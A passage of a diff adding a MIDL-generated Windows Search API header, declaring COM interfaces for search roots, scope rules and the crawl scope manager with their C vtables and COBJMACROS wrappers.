+        HRESULT ( STDMETHODCALLTYPE *Reset )( 
+            __RPC__in IEnumSearchRoots * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Clone )( 
+            __RPC__in IEnumSearchRoots * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchRoots **ppenum);
+        
+        END_INTERFACE
+    } IEnumSearchRootsVtbl;
+
+    interface IEnumSearchRoots
+    {
+        CONST_VTBL struct IEnumSearchRootsVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IEnumSearchRoots_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IEnumSearchRoots_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IEnumSearchRoots_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IEnumSearchRoots_Next(This,celt,rgelt,pceltFetched)	\
+    ( (This)->lpVtbl -> Next(This,celt,rgelt,pceltFetched) ) 
+
+#define IEnumSearchRoots_Skip(This,celt)	\
+    ( (This)->lpVtbl -> Skip(This,celt) ) 
+
+#define IEnumSearchRoots_Reset(This)	\
+    ( (This)->lpVtbl -> Reset(This) ) 
+
+#define IEnumSearchRoots_Clone(This,ppenum)	\
+    ( (This)->lpVtbl -> Clone(This,ppenum) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IEnumSearchRoots_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0011 */
+/* [local] */ 
+
+typedef /* [v1_enum] */ 
+enum _FOLLOW_FLAGS
+    {
+        FF_INDEXCOMPLEXURLS	= 0x1,
+        FF_SUPPRESSINDEXING	= 0x2
+    } 	FOLLOW_FLAGS;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0011_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0011_v0_0_s_ifspec;
+
+#ifndef __ISearchScopeRule_INTERFACE_DEFINED__
+#define __ISearchScopeRule_INTERFACE_DEFINED__
+
+/* interface ISearchScopeRule */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchScopeRule;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF53")
+    ISearchScopeRule : public IUnknown
+    {
+    public:
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PatternOrURL( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszPatternOrURL) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsIncluded( 
+            /* [retval][out] */ __RPC__out BOOL *pfIsIncluded) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsDefault( 
+            /* [retval][out] */ __RPC__out BOOL *pfIsDefault) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FollowFlags( 
+            /* [retval][out] */ __RPC__out DWORD *pFollowFlags) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchScopeRuleVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchScopeRule * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchScopeRule * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchScopeRule * This);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PatternOrURL )( 
+            __RPC__in ISearchScopeRule * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszPatternOrURL);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsIncluded )( 
+            __RPC__in ISearchScopeRule * This,
+            /* [retval][out] */ __RPC__out BOOL *pfIsIncluded);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsDefault )( 
+            __RPC__in ISearchScopeRule * This,
+            /* [retval][out] */ __RPC__out BOOL *pfIsDefault);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FollowFlags )( 
+            __RPC__in ISearchScopeRule * This,
+            /* [retval][out] */ __RPC__out DWORD *pFollowFlags);
+        
+        END_INTERFACE
+    } ISearchScopeRuleVtbl;
+
+    interface ISearchScopeRule
+    {
+        CONST_VTBL struct ISearchScopeRuleVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchScopeRule_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchScopeRule_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchScopeRule_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchScopeRule_get_PatternOrURL(This,ppszPatternOrURL)	\
+    ( (This)->lpVtbl -> get_PatternOrURL(This,ppszPatternOrURL) ) 
+
+#define ISearchScopeRule_get_IsIncluded(This,pfIsIncluded)	\
+    ( (This)->lpVtbl -> get_IsIncluded(This,pfIsIncluded) ) 
+
+#define ISearchScopeRule_get_IsDefault(This,pfIsDefault)	\
+    ( (This)->lpVtbl -> get_IsDefault(This,pfIsDefault) ) 
+
+#define ISearchScopeRule_get_FollowFlags(This,pFollowFlags)	\
+    ( (This)->lpVtbl -> get_FollowFlags(This,pFollowFlags) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchScopeRule_INTERFACE_DEFINED__ */
+
+
+#ifndef __IEnumSearchScopeRules_INTERFACE_DEFINED__
+#define __IEnumSearchScopeRules_INTERFACE_DEFINED__
+
+/* interface IEnumSearchScopeRules */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IEnumSearchScopeRules;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF54")
+    IEnumSearchScopeRules : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Next( 
+            /* [in] */ ULONG celt,
+            /* [size_is][out] */ __RPC__out_ecount_full(celt) ISearchScopeRule **pprgelt,
+            /* [unique][out][in] */ __RPC__inout_opt ULONG *pceltFetched) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Skip( 
+            /* [in] */ ULONG celt) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Clone( 
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchScopeRules **ppenum) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IEnumSearchScopeRulesVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IEnumSearchScopeRules * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IEnumSearchScopeRules * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IEnumSearchScopeRules * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Next )( 
+            __RPC__in IEnumSearchScopeRules * This,
+            /* [in] */ ULONG celt,
+            /* [size_is][out] */ __RPC__out_ecount_full(celt) ISearchScopeRule **pprgelt,
+            /* [unique][out][in] */ __RPC__inout_opt ULONG *pceltFetched);
+        
+        HRESULT ( STDMETHODCALLTYPE *Skip )( 
+            __RPC__in IEnumSearchScopeRules * This,
+            /* [in] */ ULONG celt);
+        
+        HRESULT ( STDMETHODCALLTYPE *Reset )( 
+            __RPC__in IEnumSearchScopeRules * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Clone )( 
+            __RPC__in IEnumSearchScopeRules * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchScopeRules **ppenum);
+        
+        END_INTERFACE
+    } IEnumSearchScopeRulesVtbl;
+
+    interface IEnumSearchScopeRules
+    {
+        CONST_VTBL struct IEnumSearchScopeRulesVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IEnumSearchScopeRules_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IEnumSearchScopeRules_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IEnumSearchScopeRules_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IEnumSearchScopeRules_Next(This,celt,pprgelt,pceltFetched)	\
+    ( (This)->lpVtbl -> Next(This,celt,pprgelt,pceltFetched) ) 
+
+#define IEnumSearchScopeRules_Skip(This,celt)	\
+    ( (This)->lpVtbl -> Skip(This,celt) ) 
+
+#define IEnumSearchScopeRules_Reset(This)	\
+    ( (This)->lpVtbl -> Reset(This) ) 
+
+#define IEnumSearchScopeRules_Clone(This,ppenum)	\
+    ( (This)->lpVtbl -> Clone(This,ppenum) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IEnumSearchScopeRules_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0013 */
+/* [local] */ 
+
+typedef /* [public][public] */ 
+enum __MIDL___MIDL_itf_searchapi_0000_0013_0001
+    {
+        CLUSIONREASON_UNKNOWNSCOPE	= 0,
+        CLUSIONREASON_DEFAULT	= 1,
+        CLUSIONREASON_USER	= 2,
+        CLUSIONREASON_GROUPPOLICY	= 3
+    } 	CLUSION_REASON;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0013_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0013_v0_0_s_ifspec;
+
+#ifndef __ISearchCrawlScopeManager_INTERFACE_DEFINED__
+#define __ISearchCrawlScopeManager_INTERFACE_DEFINED__
+
+/* interface ISearchCrawlScopeManager */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchCrawlScopeManager;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF55")
+    ISearchCrawlScopeManager : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE AddDefaultScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ DWORD fFollowFlags) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE AddRoot( 
+            /* [in] */ __RPC__in_opt ISearchRoot *pSearchRoot) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RemoveRoot( 
+            /* [in] */ __RPC__in LPCWSTR pszURL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE EnumerateRoots( 
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchRoots **ppSearchRoots) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE AddHierarchicalScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fDefault,
+            /* [in] */ BOOL fOverrideChildren) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE AddUserScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fOverrideChildren,
+            /* [in] */ DWORD fFollowFlags) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RemoveScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRule) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE EnumerateScopeRules( 
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchScopeRules **ppSearchScopeRules) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE HasParentScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasParentRule) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE HasChildScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasChildRule) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IncludedInCrawlScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfIsIncluded) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IncludedInCrawlScopeEx( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [out] */ __RPC__out BOOL *pfIsIncluded,
+            /* [out] */ __RPC__out CLUSION_REASON *pReason) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RevertToDefaultScopes( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SaveAll( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetParentScopeVersionId( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out LONG *plScopeId) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RemoveDefaultScopeRule( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchCrawlScopeManagerVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchCrawlScopeManager * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchCrawlScopeManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddDefaultScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ DWORD fFollowFlags);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRoot )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [in] */ __RPC__in_opt ISearchRoot *pSearchRoot);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveRoot )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [in] */ __RPC__in LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateRoots )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchRoots **ppSearchRoots);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddHierarchicalScope )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fDefault,
+            /* [in] */ BOOL fOverrideChildren);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddUserScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fOverrideChildren,
+            /* [in] */ DWORD fFollowFlags);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateScopeRules )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchScopeRules **ppSearchScopeRules);
+        
+        HRESULT ( STDMETHODCALLTYPE *HasParentScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasParentRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *HasChildScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasChildRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *IncludedInCrawlScope )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfIsIncluded);
+        
+        HRESULT ( STDMETHODCALLTYPE *IncludedInCrawlScopeEx )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [out] */ __RPC__out BOOL *pfIsIncluded,
+            /* [out] */ __RPC__out CLUSION_REASON *pReason);
+        
+        HRESULT ( STDMETHODCALLTYPE *RevertToDefaultScopes )( 
+            __RPC__in ISearchCrawlScopeManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *SaveAll )( 
+            __RPC__in ISearchCrawlScopeManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParentScopeVersionId )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out LONG *plScopeId);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveDefaultScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        END_INTERFACE
+    } ISearchCrawlScopeManagerVtbl;
+
+    interface ISearchCrawlScopeManager
+    {
+        CONST_VTBL struct ISearchCrawlScopeManagerVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchCrawlScopeManager_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchCrawlScopeManager_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchCrawlScopeManager_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchCrawlScopeManager_AddDefaultScopeRule(This,pszURL,fInclude,fFollowFlags)	\
+    ( (This)->lpVtbl -> AddDefaultScopeRule(This,pszURL,fInclude,fFollowFlags) ) 
+
+#define ISearchCrawlScopeManager_AddRoot(This,pSearchRoot)	\
+    ( (This)->lpVtbl -> AddRoot(This,pSearchRoot) ) 
+
+#define ISearchCrawlScopeManager_RemoveRoot(This,pszURL)	\
+    ( (This)->lpVtbl -> RemoveRoot(This,pszURL) ) 
+
+#define ISearchCrawlScopeManager_EnumerateRoots(This,ppSearchRoots)	\
+    ( (This)->lpVtbl -> EnumerateRoots(This,ppSearchRoots) ) 
+
+#define ISearchCrawlScopeManager_AddHierarchicalScope(This,pszURL,fInclude,fDefault,fOverrideChildren)	\
+    ( (This)->lpVtbl -> AddHierarchicalScope(This,pszURL,fInclude,fDefault,fOverrideChildren) ) 
+
+#define ISearchCrawlScopeManager_AddUserScopeRule(This,pszURL,fInclude,fOverrideChildren,fFollowFlags)	\
+    ( (This)->lpVtbl -> AddUserScopeRule(This,pszURL,fInclude,fOverrideChildren,fFollowFlags) ) 
+
+#define ISearchCrawlScopeManager_RemoveScopeRule(This,pszRule)	\
+    ( (This)->lpVtbl -> RemoveScopeRule(This,pszRule) ) 
+
+#define ISearchCrawlScopeManager_EnumerateScopeRules(This,ppSearchScopeRules)	\
+    ( (This)->lpVtbl -> EnumerateScopeRules(This,ppSearchScopeRules) ) 
+
+#define ISearchCrawlScopeManager_HasParentScopeRule(This,pszURL,pfHasParentRule)	\
+    ( (This)->lpVtbl -> HasParentScopeRule(This,pszURL,pfHasParentRule) ) 
+
+#define ISearchCrawlScopeManager_HasChildScopeRule(This,pszURL,pfHasChildRule)	\
+    ( (This)->lpVtbl -> HasChildScopeRule(This,pszURL,pfHasChildRule) ) 
+
+#define ISearchCrawlScopeManager_IncludedInCrawlScope(This,pszURL,pfIsIncluded)	\
+    ( (This)->lpVtbl -> IncludedInCrawlScope(This,pszURL,pfIsIncluded) ) 
+
+#define ISearchCrawlScopeManager_IncludedInCrawlScopeEx(This,pszURL,pfIsIncluded,pReason)	\
+    ( (This)->lpVtbl -> IncludedInCrawlScopeEx(This,pszURL,pfIsIncluded,pReason) ) 
+
+#define ISearchCrawlScopeManager_RevertToDefaultScopes(This)	\
+    ( (This)->lpVtbl -> RevertToDefaultScopes(This) ) 
+
+#define ISearchCrawlScopeManager_SaveAll(This)	\
+    ( (This)->lpVtbl -> SaveAll(This) ) 
+
+#define ISearchCrawlScopeManager_GetParentScopeVersionId(This,pszURL,plScopeId)	\
+    ( (This)->lpVtbl -> GetParentScopeVersionId(This,pszURL,plScopeId) ) 
+
+#define ISearchCrawlScopeManager_RemoveDefaultScopeRule(This,pszURL)	\
+    ( (This)->lpVtbl -> RemoveDefaultScopeRule(This,pszURL) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchCrawlScopeManager_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchCrawlScopeManager2_INTERFACE_DEFINED__
+#define __ISearchCrawlScopeManager2_INTERFACE_DEFINED__
+
+/* interface ISearchCrawlScopeManager2 */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchCrawlScopeManager2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("6292F7AD-4E19-4717-A534-8FC22BCD5CCD")
+    ISearchCrawlScopeManager2 : public ISearchCrawlScopeManager
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetVersion( 
+            /* [out] */ long **plVersion,
+            /* [out] */ HANDLE *phFileMapping) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchCrawlScopeManager2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchCrawlScopeManager2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchCrawlScopeManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddDefaultScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ DWORD fFollowFlags);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRoot )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [in] */ __RPC__in_opt ISearchRoot *pSearchRoot);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveRoot )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [in] */ __RPC__in LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateRoots )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchRoots **ppSearchRoots);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddHierarchicalScope )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fDefault,
+            /* [in] */ BOOL fOverrideChildren);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddUserScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [in] */ BOOL fInclude,
+            /* [in] */ BOOL fOverrideChildren,
+            /* [in] */ DWORD fFollowFlags);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateScopeRules )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumSearchScopeRules **ppSearchScopeRules);
+        
+        HRESULT ( STDMETHODCALLTYPE *HasParentScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasParentRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *HasChildScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfHasChildRule);
+        
+        HRESULT ( STDMETHODCALLTYPE *IncludedInCrawlScope )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out BOOL *pfIsIncluded);
+        
+        HRESULT ( STDMETHODCALLTYPE *IncludedInCrawlScopeEx )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [out] */ __RPC__out BOOL *pfIsIncluded,
+            /* [out] */ __RPC__out CLUSION_REASON *pReason);
+        
+        HRESULT ( STDMETHODCALLTYPE *RevertToDefaultScopes )( 
+            __RPC__in ISearchCrawlScopeManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *SaveAll )( 
+            __RPC__in ISearchCrawlScopeManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParentScopeVersionId )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out LONG *plScopeId);
+        
+        HRESULT ( STDMETHODCALLTYPE *RemoveDefaultScopeRule )( 
+            __RPC__in ISearchCrawlScopeManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetVersion )( 
+            ISearchCrawlScopeManager2 * This,
+            /* [out] */ long **plVersion,
+            /* [out] */ HANDLE *phFileMapping);
+        
+        END_INTERFACE
+    } ISearchCrawlScopeManager2Vtbl;
+
+    interface ISearchCrawlScopeManager2
+    {
+        CONST_VTBL struct ISearchCrawlScopeManager2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchCrawlScopeManager2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchCrawlScopeManager2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchCrawlScopeManager2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchCrawlScopeManager2_AddDefaultScopeRule(This,pszURL,fInclude,fFollowFlags)	\
+    ( (This)->lpVtbl -> AddDefaultScopeRule(This,pszURL,fInclude,fFollowFlags) ) 
+
+#define ISearchCrawlScopeManager2_AddRoot(This,pSearchRoot)	\
+    ( (This)->lpVtbl -> AddRoot(This,pSearchRoot) ) 
+
+#define ISearchCrawlScopeManager2_RemoveRoot(This,pszURL)	\
+    ( (This)->lpVtbl -> RemoveRoot(This,pszURL) ) 
+
+#define ISearchCrawlScopeManager2_EnumerateRoots(This,ppSearchRoots)	\
+    ( (This)->lpVtbl -> EnumerateRoots(This,ppSearchRoots) ) 
+
+#define ISearchCrawlScopeManager2_AddHierarchicalScope(This,pszURL,fInclude,fDefault,fOverrideChildren)	\
+    ( (This)->lpVtbl -> AddHierarchicalScope(This,pszURL,fInclude,fDefault,fOverrideChildren) ) 
+
+#define ISearchCrawlScopeManager2_AddUserScopeRule(This,pszURL,fInclude,fOverrideChildren,fFollowFlags)	\
+    ( (This)->lpVtbl -> AddUserScopeRule(This,pszURL,fInclude,fOverrideChildren,fFollowFlags) ) 
+
+#define ISearchCrawlScopeManager2_RemoveScopeRule(This,pszRule)	\
+    ( (This)->lpVtbl -> RemoveScopeRule(This,pszRule) ) 
+
+#define ISearchCrawlScopeManager2_EnumerateScopeRules(This,ppSearchScopeRules)	\
+    ( (This)->lpVtbl -> EnumerateScopeRules(This,ppSearchScopeRules) ) 
+
+#define ISearchCrawlScopeManager2_HasParentScopeRule(This,pszURL,pfHasParentRule)	\
+    ( (This)->lpVtbl -> HasParentScopeRule(This,pszURL,pfHasParentRule) ) 
+
+#define ISearchCrawlScopeManager2_HasChildScopeRule(This,pszURL,pfHasChildRule)	\
+    ( (This)->lpVtbl -> HasChildScopeRule(This,pszURL,pfHasChildRule) ) 
+
+#define ISearchCrawlScopeManager2_IncludedInCrawlScope(This,pszURL,pfIsIncluded)	\
+    ( (This)->lpVtbl -> IncludedInCrawlScope(This,pszURL,pfIsIncluded) ) 
+
